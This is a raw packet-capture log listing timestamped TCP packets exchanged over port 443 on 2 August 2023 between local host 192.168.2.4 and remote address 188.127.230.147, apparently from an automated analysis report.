Aug 2, 2023 10:35:15.127438068 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127458096 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127480984 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127501965 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127525091 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127527952 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127562046 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127563953 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127594948 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127620935 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127625942 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127645016 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127671957 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127682924 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127723932 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127727985 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127790928 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127810001 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127875090 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127875090 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128132105 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128160000 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128221989 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128259897 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128259897 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128277063 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128310919 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128313065 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128329992 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128349066 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128355026 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128393888 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128428936 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128452063 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128453016 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128485918 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128525972 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128562927 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128565073 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128582954 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128602028 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128640890 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128669024 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128671885 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128684998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128714085 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128748894 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128777981 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128783941 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128794909 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128849030 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128856897 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128874063 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128886938 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128952980 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.128973007 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128973007 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.128978968 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129039049 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129039049 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129051924 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129075050 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129096985 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129110098 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129143000 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129174948 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129174948 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129174948 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129204988 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129234076 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129235029 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129251003 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129295111 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129317999 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129331112 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129331112 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129389048 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129405022 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129405975 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129405975 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129439116 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129477978 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129477978 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129493952 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.129520893 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.129556894 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.130143881 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.130892038 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.134058952 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.134092093 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.134161949 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.134188890 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.134207010 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.134229898 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.140784979 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.140830040 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.140923023 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.140949011 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.140954018 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.140981913 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.141000032 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.141007900 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.141019106 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.141031981 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.141043901 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.141050100 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.141069889 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.141077042 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.141097069 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.142268896 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.142303944 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.142385960 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.142416000 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.142430067 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143393040 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143441916 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143503904 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143521070 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143533945 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143537998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143573046 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143588066 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143605947 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143636942 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143790007 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143850088 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143862009 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143883944 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.143939972 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.143948078 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.144656897 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.144727945 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.144731045 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.144745111 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.144792080 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.145904064 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.145956039 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.145998001 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146011114 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146023989 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146281004 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146346092 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146363974 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146382093 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146420956 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146506071 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146526098 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146555901 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146564960 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146579981 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146611929 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146639109 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146658897 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146667004 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146693945 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146765947 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146807909 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146812916 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146823883 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146858931 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146908998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146934986 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146955967 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.146964073 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.146986961 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.147022009 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.147042036 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.147068977 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.147077084 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.147098064 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.147099972 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.147135019 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.147146940 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.147154093 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.147187948 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187028885 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187072039 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187189102 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187222958 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187278032 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187304974 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187349081 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187366962 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187391043 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187398911 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187422037 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187465906 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187484980 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187500954 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187503099 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187529087 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187558889 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187572956 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187594891 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187599897 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187618971 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187654018 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187669992 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187690020 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187690020 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187715054 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187750101 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187768936 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187786102 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187788010 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187807083 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.187932968 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.187949896 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.192039013 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.192080021 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.192178965 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.192223072 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.192249060 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.197815895 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.197849035 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.198002100 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.198002100 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.198052883 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.198523998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.198581934 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.198640108 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.198669910 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.198704958 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.200059891 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.200083971 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.200217962 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.200261116 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.200299025 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.201092958 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.201131105 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.201215982 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.201252937 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.201287031 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.201370955 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.201391935 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.201445103 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.201472998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.201500893 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.202280998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202337980 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202404022 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.202435017 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202455044 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202456951 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.202472925 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202519894 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.202533960 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202558041 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.202925920 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.202960968 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.203020096 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.203044891 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.203071117 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.204565048 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.204587936 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.204687119 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.204729080 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.204756975 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.204758883 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.204787016 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.204909086 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.204909086 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.204932928 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205394983 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205415964 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205548048 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.205548048 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.205575943 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205655098 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205686092 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205734015 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.205754042 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.205776930 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.206024885 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.206296921 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.206320047 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.206391096 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.206412077 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.206440926 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.207140923 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207202911 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207257032 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.207283974 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207315922 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.207326889 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207346916 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207391024 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.207412004 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207431078 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.207678080 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207705975 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207762003 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.207787037 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.207808971 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.231338024 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.231395960 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.231569052 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.231606960 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.246726990 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.246761084 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.246915102 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.246958017 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.246992111 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247009993 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247039080 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247070074 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247092009 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247112989 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247302055 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247351885 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247360945 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247379065 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247411013 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247601986 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247622013 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247667074 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247684002 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247706890 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.247940063 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.247967005 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248018980 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.248044968 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248070002 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.248240948 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248261929 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248312950 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.248330116 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248352051 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.248580933 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248609066 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248648882 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.248673916 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.248693943 CEST	49694	443	192.168.2.4	188.127.230.147
